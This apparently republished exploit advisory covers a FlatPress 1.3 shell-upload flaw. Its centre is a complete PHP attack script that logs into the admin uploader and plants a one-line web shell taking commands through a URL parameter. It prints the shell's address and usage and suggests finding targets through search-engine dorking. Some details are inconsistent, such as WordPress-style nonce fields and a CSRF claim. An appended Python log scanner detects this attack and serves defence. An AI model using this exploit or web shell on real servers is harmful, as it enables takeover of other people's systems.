The FlatPress 1.3 Shell Upload refers to a critical vulnerability in the FlatPress blogging engine, version 1.3.
This flaw allowed unauthenticated attackers to achieve Remote Code Execution (RCE). The exploit leveraged a weakness in file upload handling.
Attackers could bypass file type restrictions by first uploading a malicious `.htaccess` file. This `.htaccess` file would configure the web server to interpret a seemingly innocuous file extension (e.g., `.jpg` or `.txt`) as a PHP script.
Subsequently, the attacker would upload a PHP web shell using the "allowed" extension. When accessed, this file would execute, granting the attacker full control over the compromised server.
This allowed for data manipulation, defacement, or further system compromise. The vulnerability was patched in FlatPress 1.4, making updates essential for security.
=============================================================================================================================================
| # Title : FlatPress 1.3 shell upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://github.com/flatpressblog/flatpress/archive/1.3.zip |
=============================================================================================================================================
POC :
[+] Dorking in Google Or Other Search Engine.
[+] Code Description: The script performs an attack on a website's control panel by exploiting CSRF vulnerabilities and uploading a shell via the website's administrative interface.
(Related : https://packetstorm.news/files/id/178208/ Related CVE numbers: ) .
[+] save code as poc.php.
[+] Usage: script.php <base_url> <username> <password>
[+] PayLoad :
<?php
function random_string($length = 5) {
$letters = 'abcdefghijklmnopqrstuvwxyz';
return substr(str_shuffle($letters), 0, $length);
}
function login_and_upload($base_url, $username, $password) {
$filename = random_string() . ".php";
$login_url = "http://{$base_url}/login.php";
$upload_url = "http://{$base_url}/admin.php?p=uploader&action=default";
$ch = curl_init();
$login_data = [
'user' => $username,
'pass' => $password,
'submit' => 'Login'
];
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
$response = curl_exec($ch);
if (strpos($response, 'Logout') !== false) {
echo "Login Successful!\n";
} else {
echo "Login Failed!\n";
echo $response;
return;
}
echo "Shell uploading...\n";
$files = [
'upload[]' => new CURLFile('php://memory', 'text/php', '<?php echo `$_GET[0]`; ?>')
];
$form_data = [
'_wpnonce' => '9e0ed04260',
'_wp_http_referer' => '/admin.php?p=uploader',
'upload' => 'Upload'
];
curl_setopt($ch, CURLOPT_URL, $upload_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, array_merge($form_data, $files));
$response = curl_exec($ch);
if (strpos($response, 'File(s) uploaded') !== false || strpos($response, 'Upload') !== false) {
$shell_url = "http://{$base_url}/fp-content/attachs/{$filename}";
echo "Your Shell is Ready: {$shell_url}\n";
echo "Shell Usage: {$shell_url}?0=command\n";
} else {
echo "Exploit Failed!\n";
echo $response;
}
curl_close($ch);
}
if ($argc != 4) {
echo "Usage: script.php <base_url> <username> <password>\n";
} else {
list($script, $base_url, $username, $password) = $argv;
login_and_upload($base_url, $username, $password);
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
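A defender's view of the flow above, as an added example that is not part of the original advisory: it scans web-server access logs for requests that run content out of `fp-content/attachs/`, the upload directory named in the PoC, and raises severity when the same client posted to the uploader earlier. The combined log format, the extension list, the severity labels and the sample lines are assumptions constructed for illustration.

```python
import re

# Paths come from the advisory; the extension list, log format and severity
# labels are assumptions made for this example.
UPLOAD_DIR = "/fp-content/attachs/"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)$")
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" \d{3} ')

def classify(line):
    """Return (client_ip, reason) for a request of interest, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target = m.groups()
    path, _, query = target.partition("?")
    path = path.lower()
    if method == "POST" and path.endswith("/admin.php") and "p=uploader" in query:
        return ip, "upload"  # normal admin activity, kept for correlation
    if UPLOAD_DIR not in path:
        return None
    if SCRIPT_EXT.search(path):
        return ip, "script-in-attachs"
    if query:
        # Covers a remapped extension: static attachments take no parameters.
        return ip, "query-on-attachment"
    return None

def scan(lines):
    """Return (line_no, ip, reason, severity) for each suspicious request."""
    uploaders, findings = set(), []
    for n, line in enumerate(lines, 1):
        hit = classify(line)
        if hit is None:
            continue
        ip, reason = hit
        if reason == "upload":
            uploaders.add(ip)
        else:
            findings.append((n, ip, reason, "high" if ip in uploaders else "medium"))
    return findings

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Mar/2025:10:00:01 +0000] "GET /fp-content/attachs/photo.jpg HTTP/1.1" 200 48211',
    '192.0.2.10 - - [10/Mar/2025:10:02:11 +0000] "POST /admin.php?p=uploader&action=default HTTP/1.1" 200 5120',
    '192.0.2.10 - - [10/Mar/2025:10:02:15 +0000] "GET /fp-content/attachs/abcde.php?0=id HTTP/1.1" 200 54',
    '198.51.100.7 - - [10/Mar/2025:10:05:40 +0000] "GET /fp-content/attachs/notes.txt?0=id HTTP/1.1" 200 54',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The query-string rule is what catches the extension-remap case from the introduction, where the executed file keeps an allowed extension such as `.txt` or `.jpg`.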
FlatPress 1.3 Shell Upload
- Written by: khalil shreateh